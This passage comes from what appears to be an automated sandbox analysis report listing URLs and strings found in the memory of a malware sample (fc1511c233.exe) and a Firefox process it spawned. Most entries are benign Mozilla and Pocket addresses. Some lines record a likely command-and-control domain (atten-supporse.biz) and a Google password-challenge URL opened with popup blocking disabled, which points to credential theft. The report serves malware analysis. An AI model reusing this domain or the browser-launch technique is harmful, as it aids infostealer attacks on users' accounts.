                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F9445A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0.
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0W
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F9445A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: http://stackoverflow.com/questions/30030031)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sMust
                          Source: file.exe, file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updateSERVICE_NOT_ENOUGH_COMMAND_LINE_ARGSSERVICE_STILL_APPLYING_NO_
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 0000002F.00000002.3570570274.000001F944D85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulCan
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPanelUI._onNotificationButtonEvent(even
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
                          Source: firefox.exe, 0000002F.00000002.3570570274.000001F944DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderQuick
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderRemot
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Startu
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761101162.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: fc1511c233.exe, 0000001B.00000003.3315367443.0000000005B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B015000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F944538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F9438A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/
                          Source: firefox.exe, 0000002F.00000002.3468613380.000001F943C8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 0000002F.00000002.3640517520.000001F94AE67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3361530870.000001F942700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/instrumentIndividualClass
                          Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 0000002F.00000002.3464541516.000001F94361D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.caextensions.experiments.enabledPREF_UPDATE_REQUIREBUILTINCERTSfully-perso
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3570570274.000001F944DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3640517520.000001F94AE5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3640517520.000001F94AEAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000002F.00000002.3436300890.000001F932589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3418749970.000001F943BB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
                          Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com/
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360462516.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3359994759.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393346845.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000002.3322642385.000000000152D000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3319359990.0000000001529000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 00000020.00000003.3320013727.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                          Source: fc1511c233.exe, 0000001B.00000003.3316698804.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3314921050.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/$$M
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/%
                          Source: fc1511c233.exe, 0000001B.00000003.3314391568.00000000014A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/1$
                          Source: fc1511c233.exe, 0000001B.00000003.3360534576.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393675987.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3391599259.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3430105657.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3360462516.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3359994759.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3341908004.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3393346845.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/?
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/a4
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/collections
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/explore/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabcd09ae95-e2cf-4b8b-8929-791b0
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/HighlightsFeed.j
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreapplication/x-www-form-urlencoded;
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://getpocket.com/read/$
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmp, firefox.exe, 0000002F.00000002.3615821219.000001F9461C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsPocket
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: firefox.exe, 0000002F.00000002.3449451323.000001F93FF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                          Source: firefox.exe, 0000002F.00000002.3616491974.000001F9463B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 0000002F.00000002.3616491974.000001F9463B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 0000002F.00000003.3362544511.000001F94290F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3451619202.000001F942070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3361530870.000001F942700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/aboutConfigPrefs.jsexperiment-apis/sy
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotshandleTopSitesOrganicImpressionStatsThomas
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporter
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporterWikipedia
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gpuweb.github.io/gpuweb/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
                          Source: firefox.exe, 0000002F.00000002.3437343071.000001F932811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
